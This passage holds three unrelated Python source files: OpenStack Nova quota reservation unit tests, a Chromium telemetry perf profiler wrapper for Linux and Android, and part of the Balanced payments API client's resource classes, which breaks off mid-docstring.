('quota_reserve', expire, 0, 0),
])
self.assertEqual(result, ['resv-1', 'resv-2', 'resv-3'])
def test_reserve_int_expire(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
result = self.driver.reserve(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2), expire=3600)
expire = timeutils.utcnow() + datetime.timedelta(seconds=3600)
self.assertEqual(self.calls, [
'get_project_quotas',
('quota_reserve', expire, 0, 0),
])
self.assertEqual(result, ['resv-1', 'resv-2', 'resv-3'])
def test_reserve_timedelta_expire(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
expire_delta = datetime.timedelta(seconds=60)
result = self.driver.reserve(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2), expire=expire_delta)
expire = timeutils.utcnow() + expire_delta
self.assertEqual(self.calls, [
'get_project_quotas',
('quota_reserve', expire, 0, 0),
])
self.assertEqual(result, ['resv-1', 'resv-2', 'resv-3'])
def test_reserve_datetime_expire(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
expire = timeutils.utcnow() + datetime.timedelta(seconds=120)
result = self.driver.reserve(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2), expire=expire)
self.assertEqual(self.calls, [
'get_project_quotas',
('quota_reserve', expire, 0, 0),
])
self.assertEqual(result, ['resv-1', 'resv-2', 'resv-3'])
def test_reserve_until_refresh(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
self.flags(until_refresh=500)
expire = timeutils.utcnow() + datetime.timedelta(seconds=120)
result = self.driver.reserve(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2), expire=expire)
self.assertEqual(self.calls, [
'get_project_quotas',
('quota_reserve', expire, 500, 0),
])
self.assertEqual(result, ['resv-1', 'resv-2', 'resv-3'])
def test_reserve_max_age(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
self.flags(max_age=86400)
expire = timeutils.utcnow() + datetime.timedelta(seconds=120)
result = self.driver.reserve(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2), expire=expire)
self.assertEqual(self.calls, [
'get_project_quotas',
('quota_reserve', expire, 0, 86400),
])
self.assertEqual(result, ['resv-1', 'resv-2', 'resv-3'])
def test_usage_reset(self):
calls = []
def fake_quota_usage_update(context, project_id, resource, **kwargs):
calls.append(('quota_usage_update', context, project_id,
resource, kwargs))
if resource == 'nonexist':
raise exception.QuotaUsageNotFound(project_id=project_id)
self.stubs.Set(db, 'quota_usage_update', fake_quota_usage_update)
ctx = FakeContext('test_project', 'test_class')
resources = ['res1', 'res2', 'nonexist', 'res4']
self.driver.usage_reset(ctx, resources)
# Make sure we had some calls
self.assertEqual(len(calls), len(resources))
# Extract the elevated context that was used and do some
# sanity checks
elevated = calls[0][1]
self.assertEqual(elevated.project_id, ctx.project_id)
self.assertEqual(elevated.quota_class, ctx.quota_class)
self.assertEqual(elevated.is_admin, True)
# Now check that all the expected calls were made
exemplar = [('quota_usage_update', elevated, 'test_project',
res, dict(in_use=-1)) for res in resources]
self.assertEqual(calls, exemplar)
class FakeSession(object):
def begin(self):
return self
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
return False
class FakeUsage(sqa_models.QuotaUsage):
def save(self, *args, **kwargs):
pass
class QuotaReserveSqlAlchemyTestCase(test.TestCase):
# nova.db.sqlalchemy.api.quota_reserve is so complex it needs its
# own test case, and since it's a quota manipulator, this is the
# best place to put it...
def setUp(self):
super(QuotaReserveSqlAlchemyTestCase, self).setUp()
self.sync_called = set()
def make_sync(res_name):
def sync(context, project_id, session):
self.sync_called.add(res_name)
if res_name in self.usages:
if self.usages[res_name].in_use < 0:
return {res_name: 2}
else:
return {res_name: self.usages[res_name].in_use - 1}
return {res_name: 0}
return sync
self.resources = {}
for res_name in ('instances', 'cores', 'ram'):
res = quota.ReservableResource(res_name, make_sync(res_name))
self.resources[res_name] = res
self.expire = timeutils.utcnow() + datetime.timedelta(seconds=3600)
self.usages = {}
self.usages_created = {}
self.reservations_created = {}
def fake_get_session():
return FakeSession()
def fake_get_quota_usages(context, session, project_id):
return self.usages.copy()
def fake_quota_usage_create(context, project_id, resource, in_use,
reserved, until_refresh, session=None,
save=True):
quota_usage_ref = self._make_quota_usage(
project_id, resource, in_use, reserved, until_refresh,
timeutils.utcnow(), timeutils.utcnow())
self.usages_created[resource] = quota_usage_ref
return quota_usage_ref
def fake_reservation_create(context, uuid, usage_id, project_id,
resource, delta, expire, session=None):
reservation_ref = self._make_reservation(
uuid, usage_id, project_id, resource, delta, expire,
timeutils.utcnow(), timeutils.utcnow())
self.reservations_created[resource] = reservation_ref
return reservation_ref
self.stubs.Set(sqa_api, 'get_session', fake_get_session)
self.stubs.Set(sqa_api, '_get_quota_usages', fake_get_quota_usages)
self.stubs.Set(sqa_api, '_quota_usage_create', fake_quota_usage_create)
self.stubs.Set(sqa_api, 'reservation_create', fake_reservation_create)
self.useFixture(test.TimeOverride())
def _make_quota_usage(self, project_id, resource, in_use, reserved,
until_refresh, created_at, updated_at):
quota_usage_ref = FakeUsage()
quota_usage_ref.id = len(self.usages) + len(self.usages_created)
quota_usage_ref.project_id = project_id
quota_usage_ref.resource = resource
quota_usage_ref.in_use = in_use
quota_usage_ref.reserved = reserved
quota_usage_ref.until_refresh = until_refresh
quota_usage_ref.created_at = created_at
quota_usage_ref.updated_at = updated_at
quota_usage_ref.deleted_at = None
quota_usage_ref.deleted = False
return quota_usage_ref
def init_usage(self, project_id, resource, in_use, reserved,
until_refresh=None, created_at=None, updated_at=None):
if created_at is None:
created_at = timeutils.utcnow()
if updated_at is None:
updated_at = timeutils.utcnow()
quota_usage_ref = self._make_quota_usage(project_id, resource, in_use,
reserved, until_refresh,
created_at, updated_at)
self.usages[resource] = quota_usage_ref
def compare_usage(self, usage_dict, expected):
for usage in expected:
resource = usage['resource']
for key, value in usage.items():
actual = getattr(usage_dict[resource], key)
self.assertEqual(actual, value,
"%s != %s on usage for resource %s" %
(actual, value, resource))
def _make_reservation(self, uuid, usage_id, project_id, resource,
delta, expire, created_at, updated_at):
reservation_ref = sqa_models.Reservation()
reservation_ref.id = len(self.reservations_created)
reservation_ref.uuid = uuid
reservation_ref.usage_id = usage_id
reservation_ref.project_id = project_id
reservation_ref.resource = resource
reservation_ref.delta = delta
reservation_ref.expire = expire
reservation_ref.created_at = created_at
reservation_ref.updated_at = updated_at
reservation_ref.deleted_at = None
reservation_ref.deleted = False
return reservation_ref
def compare_reservation(self, reservations, expected):
reservations = set(reservations)
for resv in expected:
resource = resv['resource']
resv_obj = self.reservations_created[resource]
self.assertIn(resv_obj.uuid, reservations)
reservations.discard(resv_obj.uuid)
for key, value in resv.items():
actual = getattr(resv_obj, key)
self.assertEqual(actual, value,
"%s != %s on reservation for resource %s" %
(actual, value, resource))
self.assertEqual(len(reservations), 0)
def test_quota_reserve_create_usages(self):
context = FakeContext('test_project', 'test_class')
quotas = dict(
instances=5,
cores=10,
ram=10 * 1024,
)
deltas = dict(
instances=2,
cores=4,
ram=2 * 1024,
)
result = sqa_api.quota_reserve(context, self.resources, quotas,
deltas, self.expire, 0, 0)
self.assertEqual(self.sync_called, set(['instances', 'cores', 'ram']))
self.compare_usage(self.usages_created, [
dict(resource='instances',
project_id='test_project',
in_use=0,
reserved=2,
until_refresh=None),
dict(resource='cores',
project_id='test_project',
in_use=0,
reserved=4,
until_refresh=None),
dict(resource='ram',
project_id='test_project',
in_use=0,
reserved=2 * 1024,
until_refresh=None),
])
self.compare_reservation(result, [
dict(resource='instances',
usage_id=self.usages_created['instances'],
project_id='test_project',
delta=2),
dict(resource='cores',
usage_id=self.usages_created['cores'],
project_id='test_project',
delta=4),
dict(resource='ram',
usage_id=self.usages_created['ram'],
delta=2 * 1024),
])
def test_quota_reserve_negative_in_use(self):
self.init_usage('test_project', 'instances', -1, 0, until_refresh=1)
self.init_usage('test_project', 'cores', -1, 0, until_refresh=1)
self.init_usage('test_project', 'ram', -1, 0, until_refresh=1)
context = FakeContext('test_project', 'test_class')
quotas = dict(
instances=5,
cores=10,
ram=10 * 1024,
)
deltas = dict(
instances=2,
cores=4,
ram=2 * 1024,
)
result = sqa_api.quota_reserve(context, self.resources, quotas,
deltas, self.expire, 5, 0)
self.assertEqual(self.sync_called, set(['instances', 'cores', 'ram']))
self.compare_usage(self.usages, [
dict(resource='instances',
project_id='test_project',
in_use=2,
reserved=2,
until_refresh=5),
dict(resource='cores',
project_id='test_project',
in_use=2,
reserved=4,
until_refresh=5),
dict(resource='ram',
project_id='test_project',
in_use=2,
reserved=2 * 1024,
until_refresh=5),
])
self.assertEqual(self.usages_created, {})
self.compare_reservation(result, [
dict(resource='instances',
usage_id=self.usages['instances'],
project_id='test_project',
delta=2),
dict(resource='cores',
usage_id=self.usages['cores'],
project_id='test_project',
delta=4),
dict(resource='ram',
usage_id=self.usages['ram'],
delta=2 * 1024),
])
def test_quota_reserve_until_refresh(self):
self.init_usage('test_project', 'instances', 3, 0, until_refresh=1)
self.init_usage('test_project', 'cores', 3, 0, until_refresh=1)
self.init_usage('test_project', 'ram', 3, 0, until_refresh=1)
context = FakeContext('test_project', 'test_class')
quotas = dict(
instances=5,
cores=10,
ram=10 * 1024,
)
deltas = dict(
instances=2,
cores=4,
ram=2 * 1024,
)
result = sqa_api.quota_reserve(context, self.resources, quotas,
deltas, self.expire, 5, 0)
self.assertEqual(self.sync_called, set(['instances', 'cores', 'ram']))
self.compare_usage(self.usages, [
dict(resource='instances',
project_id='test_project',
in_use=2,
reserved=2,
until_refresh=5),
dict(resource='cores',
project_id='test_project',
in_use=2,
reserved=4,
until_refresh=5),
dict(resource='ram',
project_id='test_project',
in_use=2,
reserved=2 * 1024,
until_refresh=5),
])
self.assertEqual(self.usages_created, {})
self.compare_reservation(result, [
dict(resource='instances',
usage_id=self.usages['instances'],
project_id='test_project',
delta=2),
dict(resource='cores',
usage_id=self.usages['cores'],
project_id='test_project',
delta=4),
dict(resource='ram',
usage_id=self.usages['ram'],
delta=2 * 1024),
])
def test_quota_reserve_max_age(self):
max_age = 3600
record_created = (timeutils.utcnow() -
datetime.timedelta(seconds=max_age))
self.init_usage('test_project', 'instances', 3, 0,
created_at=record_created, updated_at=record_created)
self.init_usage('test_project', 'cores', 3, 0,
created_at=record_created, updated_at=record_created)
self.init_usage('test_project', 'ram', 3, 0,
created_at=record_created, updated_at=record_created)
context = FakeContext('test_project', 'test_class')
quotas = dict(
instances=5,
cores=10,
ram=10 * 1024,
)
deltas = dict(
instances=2,
cores=4,
ram=2 * 1024,
)
result = sqa_api.quota_reserve(context, self.resources, quotas,
deltas, self.expire, 0, max_age)
self.assertEqual(self.sync_called, set(['instances', 'cores', 'ram']))
self.compare_usage(self.usages, [
dict(resource='instances',
project_id='test_project',
in_use=2,
reserved=2,
until_refresh=None),
dict(resource='cores',
project_id='test_project',
in_use=2,
reserved=4,
until_refresh=None),
dict(resource='ram',
project_id='test_project',
in_use=2,
reserved=2 * 1024,
until_refresh=None),
])
self.assertEqual(self.usages_created, {})
self.compare_reservation(result, [
dict(resource='instances',
usage_id=self.usages['instances'],
project_id='test_project',
delta=2),
dict(resource='cores',
usage_id=self.usages['cores'],
project_id='test_project',
delta=4),
dict(resource='ram',
usage_id=self.usages['ram'],
delta=2 * 1024),
])
def test_quota_reserve_no_refresh(self):
self.init_usage('test_project', 'instances', 3, 0)
self.init_usage('test_project', 'cores', 3, 0)
self.init_usage('test_project', 'ram', 3, 0)
context = FakeContext('test_project', 'test_class')
quotas = dict(
instances=5,
cores=10,
ram=10 * 1024,
)
deltas = dict(
instances=2,
cores=4,
ram=2 * 1024,
)
result = sqa_api.quota_reserve(context, self.resources, quotas,
deltas, self.expire, 0, 0)
self.assertEqual(self.sync_called, set([]))
self.compare_usage(self.usages, [
dict(resource='instances',
project_id='test_project',
in_use=3,
reserved=2,
until_refresh=None),
dict(resource='cores',
project_id='test_project',
in_use=3,
reserved=4,
until_refresh=None),
dict(resource='ram',
project_id='test_project',
in_use=3,
reserved=2 * 1024,
until_refresh=None),
])
self.assertEqual(self.usages_created, {})
self.compare_reservation(result, [
dict(resource='instances',
usage_id=self.usages['instances'],
project_id='test_project',
delta=2),
dict(resource='cores',
usage_id=self.usages['cores'],
project_id='test_project',
delta=4),
dict(resource='ram',
usage_id=self.usages['ram'],
delta=2 * 1024),
])
def test_quota_reserve_unders(self):
self.init_usage('test_project', 'instances', 1, 0)
self.init_usage('test_project', 'cores', 3, 0)
self.init_usage('test_project', 'ram', 1 * 1024, 0)
context = FakeContext('test_project', 'test_class')
quotas = dict(
instances=5,
cores=10,
ram=10 * 1024,
)
deltas = dict(
instances=-2,
cores=-4,
ram=-2 * 1024,
)
result = sqa_api.quota_reserve(context, self.resources, quotas,
deltas, self.expire, 0, 0)
self.assertEqual(self.sync_called, set([]))
self.compare_usage(self.usages, [
dict(resource='instances',
project_id='test_project',
in_use=1,
reserved=0,
until_refresh=None),
dict(resource='cores',
project_id='test_project',
in_use=3,
reserved=0,
until_refresh=None),
dict(resource='ram',
project_id='test_project',
in_use=1 * 1024,
reserved=0,
until_refresh=None),
])
self.assertEqual(self.usages_created, {})
self.compare_reservation(result, [
dict(resource='instances',
usage_id=self.usages['instances'],
project_id='test_project',
delta=-2),
dict(resource='cores',
usage_id=self.usages['cores'],
project_id='test_project',
delta=-4),
dict(resource='ram',
usage_id=self.usages['ram'],
delta=-2 * 1024),
])
def test_quota_reserve_overs(self):
self.init_usage('test_project', 'instances', 4, 0)
self.init_usage('test_project', 'cores', 8, 0)
self.init_usage('test_project', 'ram', 10 * 1024, 0)
context = FakeContext('test_project', 'test_class')
quotas = dict(
instances=5,
cores=10,
ram=10 * 1024,
)
deltas = dict(
instances=2,
cores=4,
ram=2 * 1024,
)
self.assertRaises(exception.OverQuota,
sqa_api.quota_reserve,
context, self.resources, quotas,
deltas, self.expire, 0, 0)
self.assertEqual(self.sync_called, set([]))
self.compare_usage(self.usages, [
dict(resource='instances',
project_id='test_project',
in_use=4,
reserved=0,
until_refresh=None),
dict(resource='cores',
project_id='test_project',
in_use=8,
reserved=0,
until_refresh=None),
dict(resource='ram',
project_id='test_project',
in_use=10 * 1024,
reserved=0,
until_refresh=None),
])
self.assertEqual(self.usages_created, {})
self.assertEqual(self.reservations_created, {})
def test_quota_reserve_reduction(self):
self.init_usage('test_project', 'instances', 10, 0)
self.init_usage('test_project', 'cores', 20, 0)
self.init_usage('test_project', 'ram', 20 * 1024, 0)
context = FakeContext('test_project', 'test_class')
quotas = dict(
instances=5,
cores=10,
ram=10 * 1024,
)
deltas = dict(
instances=-2,
cores=-4,
ram=-2 * 1024,
)
result = sqa_api.quota_reserve(context, self.resources, quotas,
deltas, self.expire, 0, 0)
self.assertEqual(self.sync_called, set([]))
self.compare_usage(self.usages, [
dict(resource='instances',
project_id='test_project',
in_use=10,
reserved=0,
until_refresh=None),
dict(resource='cores',
project_id='test_project',
in_use=20,
reserved=0,
until_refresh=None),
dict(resource='ram',
project_id='test_project',
in_use=20 * 1024,
reserved=0,
until_refresh=None),
])
self.assertEqual(self.usages_created, {})
self.compare_reservation(result, [
dict(resource='instances',
usage_id=self.usages['instances'],
project_id='test_project',
delta=-2),
dict(resource='cores',
usage_id=self.usages['cores'],
project_id='test_project',
delta=-4),
dict(resource='ram',
usage_id=self.usages['ram'],
project_id='test_project',
delta=-2 * 1024),
])
class NoopQuotaDriverTestCase(test.TestCase):
def setUp(self):
super(NoopQuotaDriverTestCase, self).setUp()
self.flags(quota_instances=10,
quota_cores=20,
quota_ram=50 * 1024,
quota_floating_ips=10,
quota_metadata_items=128,
quota_injected_files=5,
quota_injected_file_content_bytes=10 * 1024,
quota_injected_file_path_bytes=255,
quota_security_groups=10,
quota_security_group_rules=20,
reservation_expire=86400,
until_refresh=0,
max_age=0,
)
self.expected_quotas = dict([(r, -1)
for r in quota.QUOTAS._resources])
self.driver = quota.NoopQuotaDriver()
def test_get_defaults(self):
# Use our pre-defined resources
result = self.driver.get_defaults(None, quota.QUOTAS._resources)
self.assertEqual(self.expected_quotas, result)
def test_get_class_quotas(self):
result = self.driver.get_class_quotas(None,
quota.QUOTAS._resources,
'test_class')
self.assertEqual(self.expected_quotas, result)
def test_get_class_quotas_no_defaults(self):
result = self.driver.get_class_quotas(None,
quota.QUOTAS._resources,
'test_class',
False)
self.assertEqual(self.expected_quotas, result)
def test_get_project_quotas(self):
result = self.driver.get_project_quotas(None,
quota.QUOTAS._resources,
'test_project')
self.assertEqual(self.expected_quotas, result)
def test_get_project_quotas_no_defaults(self):
result = self.driver.get_project_quotas(None,
quota.QUOTAS._resources,
'test_project',
defaults=False)
self.assertEqual(self.expected_quotas, result)
def test_get_project_quotas_no_usages(self):
result = self.driver.get_project_quotas(None,
quota.QUOTAS._resources,
'test_project',
usages=False)
self.assertEqual(self.expected_quotas, result)
|
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import re
import signal
import subprocess
import sys
import tempfile
from pylib.device import device_errors # pylint: disable=F0401
from telemetry.core import platform
from telemetry.core.platform import profiler
from telemetry.core.platform.profiler import android_profiling_helper
from telemetry.core import util
from telemetry.util import support_binaries
util.AddDirToPythonPath(util.GetChromiumSrcDir(), 'build', 'android')
from pylib.perf import perf_control # pylint: disable=F0401
_PERF_OPTIONS = [
# In perf 3.13 --call-graph requires an argument, so use the -g short-hand
# which does not.
'-g',
# Increase sampling frequency for better coverage.
'--freq', '2000',
]
_PERF_OPTIONS_ANDROID = [
# Increase priority to avoid dropping samples. Requires root.
'--realtime', '80',
]
def _NicePath(path):
rel_path = os.path.relpath(path, os.curdir)
return rel_path if len(rel_path) < len(path) else path
def _PrepareHostForPerf():
kptr_file = '/proc/sys/kernel/kptr_restrict'
with open(kptr_file) as f:
if f.read().strip() != '0':
logging.warning('Making kernel symbols unrestricted. You might have to '
'enter your password for "sudo".')
with tempfile.NamedTemporaryFile() as zero:
zero.write('0')
zero.flush()
subprocess.call(['/usr/bin/sudo', 'cp', zero.name, kptr_file])
def _InstallPerfHost():
perfhost_name = android_profiling_helper.GetPerfhostName()
host = platform.GetHostPlatform()
if not host.CanLaunchApplication(perfhost_name):
host.InstallApplication(perfhost_name)
return support_binaries.FindPath(perfhost_name, 'x86_64', 'linux')
class _SingleProcessPerfProfiler(object):
"""An internal class for using perf for a given process.
On android, this profiler uses pre-built binaries from AOSP.
See more details in prebuilt/android/README.txt.
"""
def __init__(self, pid, output_file, browser_backend, platform_backend,
perf_binary, perfhost_binary):
self._pid = pid
self._browser_backend = browser_backend
self._platform_backend = platform_backend
self._output_file = output_file
self._tmp_output_file = tempfile.NamedTemporaryFile('w', 0)
self._is_android = platform_backend.GetOSName() == 'android'
self._perf_binary = perf_binary
self._perfhost_binary = perfhost_binary
cmd_prefix = []
perf_args = ['record', '--pid', str(pid)]
if self._is_android:
cmd_prefix = ['adb', '-s', browser_backend.adb.device_serial(), 'shell',
perf_binary]
perf_args += _PERF_OPTIONS_ANDROID
output_file = os.path.join('/sdcard', 'perf_profiles',
os.path.basename(output_file))
self._device_output_file = output_file
browser_backend.adb.RunShellCommand(
'mkdir -p ' + os.path.dirname(self._device_output_file))
browser_backend.adb.RunShellCommand('rm -f ' + self._device_output_file)
else:
cmd_prefix = [perf_binary]
perf_args += ['--output', output_file] + _PERF_OPTIONS
self._proc = subprocess.Popen(cmd_prefix + perf_args,
stdout=self._tmp_output_file, stderr=subprocess.STDOUT)
def CollectProfile(self):
if ('renderer' in self._output_file and
not self._is_android and
not self._platform_backend.GetCommandLine(self._pid)):
logging.warning('Renderer was swapped out during profiling. '
'To collect a full profile rerun with '
'"--extra-browser-args=--single-process"')
if self._is_android:
device = self._browser_backend.adb.device()
try:
binary_name = os.path.basename(self._perf_binary)
device.KillAll(binary_name, signum=signal.SIGINT, blocking=True)
except device_errors.CommandFailedError:
logging.warning('The perf process could not be killed on the device.')
self._proc.send_signal(signal.SIGINT)
exit_code = self._proc.wait()
try:
if exit_code == 128:
raise Exception(
"""perf failed with exit code 128.
Try rerunning this script under sudo or setting
/proc/sys/kernel/perf_event_paranoid to "-1".\nOutput:\n%s""" %
self._GetStdOut())
elif exit_code not in (0, -2):
raise Exception(
'perf failed with exit code %d. Output:\n%s' % (exit_code,
self._GetStdOut()))
finally:
self._tmp_output_file.close()
cmd = '%s report -n -i %s' % (_NicePath(self._perfhost_binary),
self._output_file)
if self._is_android:
device = self._browser_backend.adb.device()
device.old_interface.Adb().Pull(self._device_output_file,
self._output_file)
required_libs = \
android_profiling_helper.GetRequiredLibrariesForPerfProfile(
self._output_file)
symfs_root = os.path.dirname(self._output_file)
kallsyms = android_profiling_helper.CreateSymFs(device,
symfs_root,
required_libs,
use_symlinks=True)
cmd += ' --symfs %s --kallsyms %s' % (symfs_root, kallsyms)
for lib in required_libs:
lib = os.path.join(symfs_root, lib[1:])
if not os.path.exists(lib):
continue
objdump_path = android_profiling_helper.GetToolchainBinaryPath(
lib, 'objdump')
if objdump_path:
cmd += ' --objdump %s' % _NicePath(objdump_path)
break
print 'To view the profile, run:'
print ' ', cmd
return self._output_file
def _GetStdOut(self):
self._tmp_output_file.flush()
try:
with open(self._tmp_output_file.name) as f:
return f.read()
except IOError:
return ''
class PerfProfiler(profiler.Profiler):
def __init__(self, browser_backend, platform_backend, output_path, state):
super(PerfProfiler, self).__init__(
browser_backend, platform_backend, output_path, state)
process_output_file_map = self._GetProcessOutputFileMap()
self._process_profilers = []
self._perf_control = None
perf_binary = perfhost_binary = _InstallPerfHost()
try:
if platform_backend.GetOSName() == 'android':
device = browser_backend.adb.device()
perf_binary = android_profiling_helper.PrepareDeviceForPerf(device)
self._perf_control = perf_control.PerfControl(device)
self._perf_control.SetPerfProfilingMode()
else:
_PrepareHostForPerf()
for pid, output_file in process_output_file_map.iteritems():
if 'zygote' in output_file:
continue
self._process_profilers.append(
_SingleProcessPerfProfiler(
pid, output_file, browser_backend, platform_backend,
perf_binary, perfhost_binary))
except:
if self._perf_control:
self._perf_control.SetDefaultPerfMode()
raise
@classmethod
def name(cls):
return 'perf'
@classmethod
def is_supported(cls, browser_type):
if sys.platform != 'linux2':
return False
if platform.GetHostPlatform().GetOSName() == 'chromeos':
return False
return True
@classmethod
def CustomizeBrowserOptions(cls, browser_type, options):
options.AppendExtraBrowserArgs([
'--no-sandbox',
'--allow-sandbox-debugging',
])
def CollectProfile(self):
if self._perf_control:
self._perf_control.SetDefaultPerfMode()
output_files = []
for single_process in self._process_profilers:
output_files.append(single_process.CollectProfile())
return output_files
@classmethod
def GetTopSamples(cls, file_name, number):
"""Parses the perf generated profile in |file_name| and returns a
{function: period} dict of the |number| hottests functions.
"""
assert os.path.exists(file_name)
with open(os.devnull, 'w') as devnull:
_InstallPerfHost()
report = subprocess.Popen(
[android_profiling_helper.GetPerfhostName(),
'report', '--show-total-period', '-U', '-t', '^', '-i', file_name],
stdout=subprocess.PIPE, stderr=devnull).communicate()[0]
period_by_function = {}
for line in report.split('\n'):
if not line or line.startswith('#'):
continue
fields = line.split('^')
if len(fields) != 5:
continue
period = int(fields[1])
function = fields[4].partition(' ')[2]
function = re.sub('<.*>', '', function) # Strip template params.
function = re.sub('[(].*[)]', '', function) # Strip function params.
period_by_function[function] = period
if len(period_by_function) == number:
break
return period_by_function
|
|
from __future__ import unicode_literals
import uritemplate
import wac
from balanced import exc, config, utils
registry = wac.ResourceRegistry(route_prefix='/')
class JSONSchemaCollection(wac.ResourceCollection):
@property
def href(self):
return self.uri
class ObjectifyMixin(wac._ObjectifyMixin):
def _objectify(self, resource_cls, **fields):
# setting values locally, not from server
if 'links' not in fields:
for key, value in fields.iteritems():
setattr(self, key, value)
else:
self._construct_from_response(**fields)
def _construct_from_response(self, **payload):
payload = self._hydrate(payload)
meta = payload.pop('meta', None)
if isinstance(self, wac.Page):
for key, value in meta.iteritems():
setattr(self, key, value)
# the remaining keys here are just hypermedia resources
for _type, resources in payload.iteritems():
# Singular resources are represented as JSON objects. However,
# they are still wrapped inside an array:
cls = Resource.registry[_type]
for resource_body in resources:
# if we couldn't determine the type of this object we use a
# generic resource object, target that instead.
if isinstance(self, (cls, Resource)):
# we are loading onto our self, self is the target
target = self
else:
target = cls()
for key, value in resource_body.iteritems():
if key in ('links',):
continue
setattr(target, key, value)
# if loading into a collection
if target != self:
# ensure that we have a collection to hold this item
if not hasattr(self, _type):
setattr(self, _type, [])
getattr(self, _type).append(target)
@classmethod
def _hydrate(cls, payload):
"""
Construct links for objects
"""
links = payload.pop('links', {})
for key, uri in links.iteritems():
variables = uritemplate.variables(uri)
# marketplaces.card_holds
collection, resource_type = key.split('.')
item_attribute = item_property = resource_type
# if parsed from uri then retrieve. e.g. customer.id
for item in payload[collection]:
# find type, fallback to Resource if we can't determine the
# type e.g. marketplace.owner_customer
collection_type = Resource.registry.get(resource_type,
Resource)
def extract_variables_from_item(item, variables):
for v in variables:
_, item_attribute = v.split('.')
# HACK: https://github.com/PoundPay/balanced/issues/184
if item_attribute == 'self':
item_attribute = 'id'
item_value = item['links'].get(
item_attribute, item.get(item_attribute)
)
if item_value:
yield v, item_value
item_variables = dict(
extract_variables_from_item(item, variables))
# expand variables if we have them, else this is a link like
# /debits
if item_variables:
parsed_link = uritemplate.expand(uri, item_variables)
else:
parsed_link = uri
# check if this is a collection or a singular item
if any(
parsed_link.endswith(value)
for value in item_variables.itervalues()
):
# singular
if not item_property.endswith('_href'):
item_property += '_href'
lazy_href = parsed_link
elif '{' in parsed_link and '}' in parsed_link:
# the link is of the form /asdf/{asdf} which means
# that the variables could not be resolved as it
# was None. Instead of making it into a page object
# we explicitly set it to None to represent the
# attribute is None
lazy_href = None
else:
# collection
lazy_href = JSONSchemaCollection(
collection_type, parsed_link)
item.setdefault(item_property, lazy_href)
return payload
class JSONSchemaPage(wac.Page, ObjectifyMixin):
@property
def items(self):
try:
try:
return getattr(self, self.resource_cls.type)
except AttributeError:
# horrid hack because event callbacks are misnamed.
return self.event_callbacks
except AttributeError:
# Notice:
# there is no resources key in the response from server
# if the list is empty, so when we try to get something like
# `debits`, an AttributeError will be raised. Not sure is this
# behavior a bug of server, but anyway, this is just a workaround
# here for solving the problem. The issue was posted here
# https://github.com/balanced/balanced-python/issues/93
return []
class JSONSchemaResource(wac.Resource, ObjectifyMixin):
collection_cls = JSONSchemaCollection
page_cls = JSONSchemaPage
def save(self):
cls = type(self)
attrs = self.__dict__.copy()
href = attrs.pop('href', None)
if not href:
if not cls.uri_gen or not cls.uri_gen.root_uri:
raise TypeError(
'Unable to create {0} resources directly'.format(
cls.__name__
)
)
href = cls.uri_gen.root_uri
method = cls.client.put if 'id' in attrs else cls.client.post
attrs = dict(
(k, v.href if isinstance(v, Resource) else v)
for k, v in attrs.iteritems()
if not isinstance(v, (cls.collection_cls))
)
resp = method(href, data=attrs)
instance = self.__class__(**resp.data)
self.__dict__.clear()
self.__dict__.update(instance.__dict__)
return self
def delete(self):
self.client.delete(self.href)
def __dir__(self):
return self.__dict__.keys()
def __getattr__(self, item):
if isinstance(item, basestring):
suffix = '_href'
if suffix not in item:
href = getattr(self, item + suffix, None)
if href:
item_type = Resource.registry.get(item + 's', Resource)
setattr(self, item, item_type.get(href))
return getattr(self, item)
raise AttributeError(
"'{0}' has no attribute '{1}'".format(
self.__class__.__name__, item
)
)
class Resource(JSONSchemaResource):
client = config.client
registry = registry
uri_gen = wac.URIGen('/resources', '{resource}')
def unstore(self):
return self.delete()
@classmethod
def fetch(cls, href):
return cls.get(href)
@classmethod
def get(cls, href):
if href.startswith('/resources'):
# hackety hack hax
# resource is an abstract type, we shouldn't have it comeing back itself
# instead we need to figure out the type based off the api response
resp = cls.client.get(href)
resource = [
k for k in resp.data.keys() if k != 'links' and k != 'meta'
]
if resource:
return Resource.registry.get(resource[0], cls)(**resp.data)
return cls(**resp.data)
return super(Resource, cls).get(href)
class Marketplace(Resource):
"""
A Marketplace represents your central broker for all operations on the
Balanced API.
A Marketplace has a single `owner_customer` which represents your person or
business.
All Resources apart from APIKeys are associated with a Marketplace.
A Marketplace has an escrow account which receives all funds from Debits
that are not associated with Orders. The sum of the escrow (`in_escrow`) is
(Debits - Refunds + Reversals - Credits).
"""
type = 'marketplaces'
uri_gen = wac.URIGen('/marketplaces', '{marketplace}')
@utils.classproperty
def mine(cls):
"""
Returns an instance representing the marketplace associated with the
current API key used for this request.
"""
return cls.query.one()
my_marketplace = mine
class APIKey(Resource):
"""
Your APIKey is used to authenticate when performing operations on the
Balanced API. You must create an APIKey before you create a Marketplace.
**NOTE:** Never give out or expose your APIKey. You may POST to this
endpoint to create new APIKeys and then DELETE any old keys.
"""
type = 'api_keys'
uri_gen = wac.URIGen('/api_keys', '{api_key}')
class CardHold(Resource):
type = 'card_holds'
uri_gen = wac.URIGen('/card_holds', '{card_hold}')
def cancel(self):
self.is_void = True
return self.save()
def capture(self, **kwargs):
return Debit(
href=self.debits.href,
**kwargs
).save()
class Transaction(Resource):
"""
Any transfer, funds from or to, your Marketplace's escrow account or the
escrow account of an Order associated with your Marketplace.
E.g. a Credit, Debit, Refund, or Reversal.
If the Transaction is associated with an Order then it will be applied to
the Order's escrow account, not to the Marketplace's escrow account.
"""
type = 'transactions'
class Credit(Transaction):
"""
A Credit represents a transfer of funds from your Marketplace's
escrow account to a FundingInstrument.
Credits are created by calling the `credit` method on a FundingInstrument.
"""
type = 'credits'
uri_gen = wac.URIGen('/credits', '{credit}')
def reverse(self, **kwargs):
"""
Reverse a Credit. If no amount is specified it will reverse the entire
amount of the Credit, you may create many Reversals up to the sum of
the total amount of the original Credit.
:rtype: Reversal
